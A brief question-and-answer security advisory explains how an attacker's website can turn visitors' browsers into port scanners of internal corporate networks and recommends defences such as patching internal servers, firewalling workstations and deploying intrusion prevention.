- What is it?
Techniques have recently been developed for turning a user's web browser into a portscanning engine, which can be used by an attacker to remotely enumerate servers and servicers on the internal network, bypassing the firewall.
- How does it work?
An attacker sets up a website and entices corporate users to visit it. The site's HTML causes the browser to send probes to common internal network IP address ranges, then reports the results of the probes back to the attacker's web server. In this way, the browser becomes a proxy into the network.
- Should I be worried?
Enumerating services in itself is not an attack, but can be a precursor to one. An attack using the browser as a proxy might be more likely to work if the servers on the internal network have not been given the same priority for software vulnerability patching as external servers.
- How can I prevent it?
When patching software vulnerabilities on internal servers, give consideration to how the services might be accessed by workstations that also have internet access. Firewall user workstations from internal server networks and only permit access to those services specifically required. Deploy portscanning/intrusion prevention on all network segments, whether they are internet-connected or not.